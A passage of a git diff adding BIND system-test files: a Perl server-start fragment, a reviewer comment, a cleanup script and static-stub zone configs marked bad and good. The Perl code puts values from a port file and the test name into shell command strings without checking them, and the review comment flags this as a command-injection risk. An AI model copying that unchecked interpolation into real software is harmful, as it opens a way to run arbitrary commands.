/^ns(\d+)/) { + $n = $1; + } else { + die "unable to parse server number from name \"$server\"\n"; + } + + if (-e "$testdir/$server/named.notcp") { + $tcp = ""; + } + + my $ip = "10.53.0.$n"; + if (-e "$testdir/$server/named.ipv6-only") { + $ip = "fd92:7065:b8e:ffff::$n"; + } + + while (1) { + my $return = system("$DIG $tcp +noadd +nosea +nostat +noquest +nocomm +nocmd +noedns -p $port version.bind. chaos txt \@$ip > /dev/null"); + + last if ($return == 0); + + $tries++; + + if ($tries >= 30) { + print "I:$test:no response from $server\n"; + print "I:$test:failed\n"; + + system("$PERL $topdir/stop.pl $test"); + + exit 1; + } + + sleep 2; + } +} 
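Review bot: `read_ns_port` in start.pl returns the first line of `named.port` unchecked, and `check_ns_port` interpolates it into the single-string `system("$PERL $topdir/testsock.pl -p $port $options")`, which is handed to a shell; the same value reaches the dig command in `verify_ns_server`, and `$test` from the command line is interpolated into every `stop.pl` call. A malformed port file or a test name containing shell metacharacters therefore changes the command that is executed, so validate where the value is read, e.g. `die "invalid port in $file\n" unless $line =~ /^\d+$/;`, and use the list form of `system` for the calls that need no redirection. Separately, the `else` branch for a server argument that is neither `ns*` nor `ans*` prints `I:$test:failed` without a trailing newline and does not exit, so the script carries on with empty server lists and returns success; add `exit 1;` after those two prints.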
diff --git a/bin/tests/system/start.sh b/bin/tests/system/start.sh
new file mode 100755
index 0000000..06261cf
--- /dev/null
+++ b/bin/tests/system/start.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP="$(cd -P -- "$(dirname -- "$0")" && pwd -P)"
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+export SYSTEMTESTTOP
+
+$PERL "$SYSTEMTESTTOP/start.pl" "$@"
diff --git a/bin/tests/system/staticstub/clean.sh b/bin/tests/system/staticstub/clean.sh
new file mode 100755
index 0000000..f0dbe28
--- /dev/null
+++ b/bin/tests/system/staticstub/clean.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f tmp
+rm -f dig.out.*
+rm -f ns*/named.lock
+rm -f ns*/named.conf
+rm -f ns3/example.db
+rm -f ns3/undelegated.db
+rm -f ns4/sub.example.db
+rm -f ns?/named.memstats
+rm -f ns?/named.run
+rm -f ns?/named_dump.db
+rm -rf */*.signed
+rm -rf */K*
+rm -rf */dsset-*
+rm -rf */trusted.conf
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/staticstub/conf/bad01.conf b/bin/tests/system/staticstub/conf/bad01.conf
new file mode 100644
index 0000000..a849de4
--- /dev/null
+++ b/bin/tests/system/staticstub/conf/bad01.conf
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC")
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH
+# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+# PERFORMANCE OF THIS SOFTWARE.
+
+# prefix cannot be specified in the address list field.
+zone "example.com" {
+ type static-stub;
+ server-addresses { 192.0.2.0/24; };
+};
diff --git a/bin/tests/system/staticstub/conf/bad02.conf b/bin/tests/system/staticstub/conf/bad02.conf
new file mode 100644
index 0000000..9c85d00
--- /dev/null
+++ b/bin/tests/system/staticstub/conf/bad02.conf
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC")
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH
+# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+# PERFORMANCE OF THIS SOFTWARE.
+
+# server-names must be valid domain names.
+zone "example.com" {
+ type static-stub;
+ server-names { "\11.example.net"; };
+};
diff --git a/bin/tests/system/staticstub/conf/bad03.conf b/bin/tests/system/staticstub/conf/bad03.conf
new file mode 100644
index 0000000..b5aa0f4
--- /dev/null
+++ b/bin/tests/system/staticstub/conf/bad03.conf
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC")
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH
+# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+# PERFORMANCE OF THIS SOFTWARE.
+
+# Explicit port specification is not allowed (for now).
+zone "example.com" {
+ type static-stub;
+ server-addresses { 192.0.2.2 port 5301; };
+};
diff --git a/bin/tests/system/staticstub/conf/bad04.conf b/bin/tests/system/staticstub/conf/bad04.conf
new file mode 100644
index 0000000..ec25b7a
--- /dev/null
+++ b/bin/tests/system/staticstub/conf/bad04.conf
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC")
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH
+# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+# PERFORMANCE OF THIS SOFTWARE.
+
+# scoped address is not allowed.
+zone "example.com" {
+ type static-stub;
+ server-addresses { fe80::1%1; };
+};
diff --git a/bin/tests/system/staticstub/conf/bad05.conf b/bin/tests/system/staticstub/conf/bad05.conf
new file mode 100644
index 0000000..e47f412
--- /dev/null
+++ b/bin/tests/system/staticstub/conf/bad05.conf
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC")
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH
+# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+# PERFORMANCE OF THIS SOFTWARE.
+
+# server-name must not be a subdomain of the zone name.
+zone "example.com" {
+ type static-stub;
+ # server-name equals to the zone name.
+ server-names { "example.com"; };
+};
diff --git a/bin/tests/system/staticstub/conf/bad06.conf b/bin/tests/system/staticstub/conf/bad06.conf
new file mode 100644
index 0000000..be75748
--- /dev/null
+++ b/bin/tests/system/staticstub/conf/bad06.conf
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC")
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH
+# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
+# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT,
+# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
+# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
+# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
+# PERFORMANCE OF THIS SOFTWARE.
+
+# server-name must not be a subdomain of the zone name.
+zone "example.com" {
+ type static-stub;
+ # server-name is a real subdomain of the zone name.
+ server-names { "ns.example.com"; };
+};
diff --git a/bin/tests/system/staticstub/conf/bad07.conf b/bin/tests/system/staticstub/conf/bad07.conf
new file mode 100644
index 0000000..dd1879f
--- /dev/null
+++ b/bin/tests/system/staticstub/conf/bad07.conf
@@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-addresses must not be specified more than once. +zone "example.com" { + type static-stub; + server-addresses { 192.0.2.1; }; + server-addresses { 192.0.2.2; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad08.conf b/bin/tests/system/staticstub/conf/bad08.conf new file mode 100644 index 0000000..c389c9d --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad08.conf 
@@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-names must not be specified more than once. +zone "example.com" { + type static-stub; + server-names { ns1.example.net; }; + server-names { ns2.example.net; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad09.conf b/bin/tests/system/staticstub/conf/bad09.conf new file mode 100644 index 0000000..7e7144a --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad09.conf 
@@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# "masters" isn't allowed for a static-stub zone (unlike a stub zone). +zone "example.com" { + type static-stub; + masters { 192.0.2.1; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad10.conf b/bin/tests/system/staticstub/conf/bad10.conf new file mode 100644 index 0000000..b9d2862 --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad10.conf 
@@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# "server-addresses" isn't allowed for a pure stub zone. +# (or most of other types of zones, but confirming one case should be good +# enough) +zone "example.com" { + type stub; + server-addresses { 192.0.2.1; }; +}; diff --git a/bin/tests/system/staticstub/conf/bad11.conf b/bin/tests/system/staticstub/conf/bad11.conf new file mode 100644 index 0000000..0b97e70 --- /dev/null +++ b/bin/tests/system/staticstub/conf/bad11.conf 
@@ -0,0 +1,34 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# "server-names" isn't allowed for a pure stub zone. +# (or most of other types of zones, but confirming one case should be good +# enough) +zone "example.com" { + type stub; + server-names { "ns.example.net"; }; +}; diff --git a/bin/tests/system/staticstub/conf/good01.conf b/bin/tests/system/staticstub/conf/good01.conf new file mode 100644 index 0000000..93f19af --- /dev/null +++ b/bin/tests/system/staticstub/conf/good01.conf 
@@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# both server-addresses and server-names can be specified. +zone "example.com" { + type static-stub; + server-addresses { 192.0.2.1; }; + server-names { "ns.example.net"; }; +}; diff --git a/bin/tests/system/staticstub/conf/good02.conf b/bin/tests/system/staticstub/conf/good02.conf new file mode 100644 index 0000000..6a8a413 --- /dev/null +++ b/bin/tests/system/staticstub/conf/good02.conf 
@@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# both IPv4 and IPv6 server-addresses should be allowable. +zone "example.com" { + type static-stub; + server-addresses { 192.0.2.1; 2001:db8::53; }; +}; diff --git a/bin/tests/system/staticstub/conf/good03.conf b/bin/tests/system/staticstub/conf/good03.conf new file mode 100644 index 0000000..faa9ab3 --- /dev/null +++ b/bin/tests/system/staticstub/conf/good03.conf 
@@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-addresses can be empty, though it's meaningless. +zone "example.com" { + type static-stub; + server-addresses {}; +}; diff --git a/bin/tests/system/staticstub/conf/good04.conf b/bin/tests/system/staticstub/conf/good04.conf new file mode 100644 index 0000000..161e4f0 --- /dev/null +++ b/bin/tests/system/staticstub/conf/good04.conf 
@@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# server-names can be empty, though it's meaningless. +zone "example.com" { + type static-stub; + server-names {}; +}; diff --git a/bin/tests/system/staticstub/conf/good05.conf b/bin/tests/system/staticstub/conf/good05.conf new file mode 100644 index 0000000..e1db2fd --- /dev/null +++ b/bin/tests/system/staticstub/conf/good05.conf 
@@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +# Copyright (C) 2010 Internet Systems Consortium, Inc. ("ISC") +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH +# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY +# AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, +# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM +# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE +# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR +# PERFORMANCE OF THIS SOFTWARE. + +# less common options +zone "example.com" { + type static-stub; + allow-query { 127.0.0.1; }; + zone-statistics yes; +}; diff --git a/bin/tests/system/staticstub/knowngood.dig.out.rec b/bin/tests/system/staticstub/knowngood.dig.out.rec new file mode 100644 index 0000000..e854082 --- /dev/null +++ b/bin/tests/system/staticstub/knowngood.dig.out.rec 
